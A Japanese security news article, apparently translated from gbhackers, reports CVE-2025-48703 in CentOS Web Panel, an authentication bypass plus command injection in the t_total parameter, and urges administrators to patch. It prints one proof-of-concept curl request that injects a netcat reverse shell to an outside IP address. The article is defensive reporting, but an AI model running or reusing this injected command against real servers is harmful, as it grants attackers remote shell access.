CentOS Web Panel Vulnerability Allows Remote Code Execution – PoC Released
2025/06/25 gbhackers — 広く利用されている Web ホスティングのための管理ソリューション CentOS Web Panel (CWP) に、深刻なセキュリティ脆弱性が発見された。この脆弱性 CVE-2025-48703 の悪用に成功した未認証の攻撃者は、影響を受けるシステム上で任意のコマンド実行を達成し、サーバ全体でセキュリティ侵害を引き起こすという。さらに、リモート・コード実行 (RCE) を実証する PoC エクスプロイトが公開され、世界中の CWP 搭載サーバ管理者に懸念が生じている。

脆弱性の詳細
CentOS Web Panel は、CentOS/AlmaLinux/Rocky Linux や RPM ベースのディストロの、サーバ管理を簡素化するために設計された、人気のオープンソース・コントロール・パネルである。
このパネルは、Web サーバ/データベース/メール/セキュリティ機能を管理するための GUI を提供し、cPanel などの商用ソリューションを置き換える、費用対効果の高い選択肢となっている。
| CVE ID | Affected Versions | Impact |
| CVE-2025-48703 | 0.9.8.1188, 0.9.8.1204 | Unauthenticated Remote Code Exec |
セキュリティ研究者により報告された、この脆弱性が影響を及ぼす範囲は、PoC エクスプロイトの公開により、バージョン 0.9.8.1188/0.9.8.1204 であることが確認された。ただし、その他のバージョンにも影響を及ぼす可能性がある。
この PoC エクスプロイトは、2つの問題を悪用するものだ。1つ目は、ユーザー・インターフェイスの不適切な認証メカニズムの適用により、有効なユーザー認証情報を必要とすることなく、リクエストを処理できてしまう点だ。
2つ目は、chmod コマンドにおけるファイル権限の設定で使用される、t_total パラメータに存在するコマンド・インジェクションの欠陥である。
それにより、悪意のリクエストを作成する攻撃者は認証を回避し、任意のコマンド挿入を達成し、リモート・コード実行を引き起こす可能性を手にする。
エクスプロイトと影響
この PoCエクスプロイトが示すのは、攻撃者が t_total パラメータを用いてコマンドを挿入し、ファイル・マネージャのエンドポイントへ向けて、特別に細工した HTTP POST リクエストを送信する方法である。たとえば、攻撃者は、以下のコマンドを実行できる。
curl -kis ‘https://127.0.0.1:52083/myuser/index.php?module=filemanager&acc=changePerm’ –data ‘fileName=.bashrc¤tPath=/home/myuser&t_total=nc 1.2.3.4 9999 -e /bin/bash’
このコマンドが指示するのは、攻撃者のマシンへのサーバの接続であり、それにより攻撃者は、リモート・シェルへのアクセスが許可される。
このエクスプロイトを実行する前提として、有効な非 root ユーザー名が必要となるが、公開されているシステムにおいては、このユーザー名は簡単に取得/推測できるという。
緩和策と対応
この脆弱性 CVE-2025-48703 は、2025年5月の時点で、CWP 開発者に対して報告された。
管理者に対して強く推奨されるのは、CentOS Web Panel の最新バージョンへと向けたアップグレード、もしくは、提供されるパッチの速やかな適用となる。また、潜在的な攻撃を軽減するために推奨されるのは、ファイアウォール/侵入検知システム/厳格なアクセス制御の導入である。
CentOS Web Panel のリモート・コード実行の脆弱性が、攻撃の標的となるのは、今回が初めてのことではない。過去における CVE-2022-44877/CVE-2022-25046 などの脆弱性では、ルート権限でのコード実行が、攻撃者に対して許されていた。それが、浮き彫りにするのは、迅速なアップデートと綿密な監視の重要性である。
今回の CVE-2025-48703 の発見と、実際に動作するエクスプロイトの公開は、Web ベースのサーバ管理パネルに関連する継続的なリスクを示している。CentOS Web Panel を使用している組織にとって必要なことは、このセキュリティ・アップデートを優先し、不審なアクティビティを監視して、潜在的な侵害を防ぐことだ。
CentOS Web Panel の CVE-2025-48703 に限らず、Web 管理パネルのリスク深刻な問題という感じですね。未認証でのリモート・コード実行が可能となる点と、PoC まで公開される状況が示すのは、速やかな対応の必要性です。ご利用のチームは、十分に ご注意ください。よろしければ、CentOS Web Panel で検索も、ご参照ください。


You must be logged in to post a comment.